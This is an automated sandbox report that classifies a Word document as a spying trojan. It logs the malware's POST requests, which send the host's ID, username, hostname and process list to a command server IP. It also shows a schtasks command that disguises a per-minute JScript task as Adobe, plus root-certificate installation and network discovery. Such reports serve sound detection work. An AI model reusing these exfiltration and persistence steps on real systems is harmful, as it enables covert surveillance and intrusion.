Analysis Report

Overview

General Information

Joe Sandbox Version:	20.0.0
Analysis ID:	424458
Start time:	13:59:50
Joe Sandbox Product:	Cloud
Start date:	09.11.2017
Overall analysis duration:	0h 4m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	adjusted_records.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled GSI enabled (VBA) GSI enabled (Javascript)
Detection:	MAL
Classification:	mal100.evad.spre.expl.spyw.troj.winDOC@26/14@0/1
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
EGA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint document Simulate clicks Found warning dialog Click Ok Number of clicks 1257 Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, conhost.exe, WMIADAP.exe, dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	100	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior

Signature Overview

Click to jump to signature section

Software Vulnerabilities:

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49163 -> 85.93.2.148:443

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49163 -> 85.93.2.148:443

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

Networking:

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: POST /?page=get_information HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 8414Host: 85.93.2.148
Source: global traffic	HTTP traffic detected: POST /?page=get_information HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 8378Host: 85.93.2.148
Source: global traffic	HTTP traffic detected: POST /?page=get_process_list HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 668Host: 85.93.2.148

Found strings which match to known social media urls

Show sources

Source: wscript.exe	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: wscript.exe	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: wscript.exe	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST /?page=wait HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 68Host: 85.93.2.148

Urls found in memory or binary data

Show sources

Source: WINWORD.EXE	String found in binary or memory: file:///
Source: WINWORD.EXE	String found in binary or memory: file:///%f
Source: WINWORD.EXE	String found in binary or memory: file:///C:
Source: WINWORD.EXE	String found in binary or memory: file:///C:/Users/user/Desktop/adjusted_records.doc
Source: WINWORD.EXE	String found in binary or memory: file:///C:/Users/user/Desktop/adjusted_records.doc))
Source: wscript.exe	String found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: wscript.exe	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wscript.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exe	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exe	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wscript.exe	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wscript.exe	String found in binary or memory: http://crl.use
Source: wscript.exe	String found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: wscript.exe	String found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: wscript.exe	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: WINWORD.EXE	String found in binary or memory: http://ns.ad
Source: WINWORD.EXE	String found in binary or memory: http://ns.adbe.
Source: wscript.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exe	String found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exe	String found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exe	String found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exe	String found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exe	String found in binary or memory: http://ocsp.entrust.net0D
Source: WINWORD.EXE	String found in binary or memory: http://p
Source: wscript.exe	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exe	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: WINWORD.EXE	String found in binary or memory: http://www.msnusers.com
Source: wscript.exe	String found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: wscript.exe	String found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: wscript.exe	String found in binary or memory: http://www.usertrust.com1
Source: wscript.exe	String found in binary or memory: https://
Source: wscript.exe	String found in binary or memory: https://85.93.2.148/?page=get_information
Source: wscript.exe	String found in binary or memory: https://85.93.2.148/?page=get_informationBK
Source: wscript.exe	String found in binary or memory: https://85.93.2.148/?page=get_informationY
Source: wscript.exe	String found in binary or memory: https://85.93.2.148/?page=get_informationx
Source: wscript.exe	String found in binary or memory: https://85.93.2.148/?page=get_process_list
Source: wscript.exe	String found in binary or memory: https://85.93.2.148/?page=get_process_listX
Source: wscript.exe	String found in binary or memory: https://85.93.2.148/?page=waitl
Source: wscript.exe	String found in binary or memory: https://97
Source: wscript.exe	String found in binary or memory: https://secure.comodo.com/CPS0

Uses HTTPS

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164

Uses a known web browser user agent for HTTP communication

Show sources

Source: global traffic	HTTP traffic detected: POST /?page=wait HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 68Host: 85.93.2.148
Source: global traffic	HTTP traffic detected: POST /?page=wait HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 68Host: 85.93.2.148
Source: global traffic	HTTP traffic detected: POST /?page=get_information HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 8414Host: 85.93.2.148
Source: global traffic	HTTP traffic detected: POST /?page=get_information HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 8378Host: 85.93.2.148
Source: global traffic	HTTP traffic detected: POST /?page=wait HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 68Host: 85.93.2.148
Source: global traffic	HTTP traffic detected: POST /?page=get_process_list HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: /Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 668Host: 85.93.2.148

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1

Stealing of Sensitive Information:

Leaks process information

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49171 -> 85.93.2.148:443

Uploads sensitive system information to the internet (privacy leak)

Show sources

Source: 192.168.1.16:49163 -> 85.93.2.148:443	HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&
Source: 192.168.1.16:49164 -> 85.93.2.148:443	HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&
Source: 192.168.1.16:49168 -> 85.93.2.148:443	HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6\|UserName:user\|HostName:computer\|DomainNetwork:yes\|Domain:WORKGROUP\|ADInf
Source: 192.168.1.16:49168 -> 85.93.2.148:443	HTTP traffic detected: Header contains sensitive information computer (computername): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6\|UserName:user\|HostName:computer\|DomainNetwork:yes\|Domain:WORKGROUP\|ADIn
Source: 192.168.1.16:49168 -> 85.93.2.148:443	HTTP traffic detected: Header contains sensitive information user (username): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6\|UserName:user\|HostName:computer\|DomainNetwork:yes\|Domain:WORKGROUP\|ADInfo
Source: 192.168.1.16:49169 -> 85.93.2.148:443	HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6\|UserName:user\|HostName:computer\|DomainNetwork:yes\|Domain:WORKGROUP\|ADInf
Source: 192.168.1.16:49169 -> 85.93.2.148:443	HTTP traffic detected: Header contains sensitive information computer (computername): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6\|UserName:user\|HostName:computer\|DomainNetwork:yes\|Domain:WORKGROUP\|ADIn
Source: 192.168.1.16:49169 -> 85.93.2.148:443	HTTP traffic detected: Header contains sensitive information user (username): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6\|UserName:user\|HostName:computer\|DomainNetwork:yes\|Domain:WORKGROUP\|ADInfo
Source: 192.168.1.16:49170 -> 85.93.2.148:443	HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&
Source: 192.168.1.16:49171 -> 85.93.2.148:443	HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 53 79 73 74 65 6d 20 49 64 6c 65 20 50 72 6f 63 65 73 73 2a 30 7c 53 79 73 74 65 6d 2a 34 7c 73 6d 73 73 2e 65 78 65 2a 32 30 30 7c 63 73 72 73 73 2e 65 78 65 2a 32 37 36 7c 77 69 6e 69 6e 69 74 2e 65 78 65 2a 33 31 32 7c 63 73 72 73 73 2e 65 78 65 2a 33 32 30 7c 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 2a 33 34 38 7c 73 65 72 76 69 63 65 73 2e 65 78 65 2a 34 30 34 7c 6c 73 61 73 73 2e 65 78 65 2a 34 32 30 7c 6c 73 6d 2e 65 78 65 2a 34 32 38 7c 73 76 63 68 6f 73 74 2e 65 78 65 2a 35 33 36 7c 73 76 63 68 6f 73 74 2e 65 78 65 2a 36 30 30 7c 73 76 63 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=System Idle Process0\|System4\|smss.exe200\|csrss.exe276\|wininit.exe312\|csrss.exe320\|winlogon.exe*34

Persistence and Installation Behavior:

Installs new ROOT certificates

Show sources

Source: C:\Windows\System32\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\wscript.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Spreading:

Creates COM task schedule object (often to register a task for autostart)

Show sources

Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Performs a network lookup / discovery via ARP

Show sources

Source: unknown	Process created: C:\Windows\System32\ARP.EXE arp -a
Source: unknown	Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ARP.EXE arp -a

Performs a network lookup / discovery via net view

Show sources

Source: unknown	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view

System Summary:

Executable creates window controls seldom found in malware

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Window found: window name: SysTabControl32

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Binary contains paths to development resources

Show sources

Source: WINWORD.EXE

Binary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K

Classification label

Show sources

Source: classification engine

Classification label: mal100.evad.spre.expl.spyw.troj.winDOC@26/14@0/1

Creates files inside the user directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

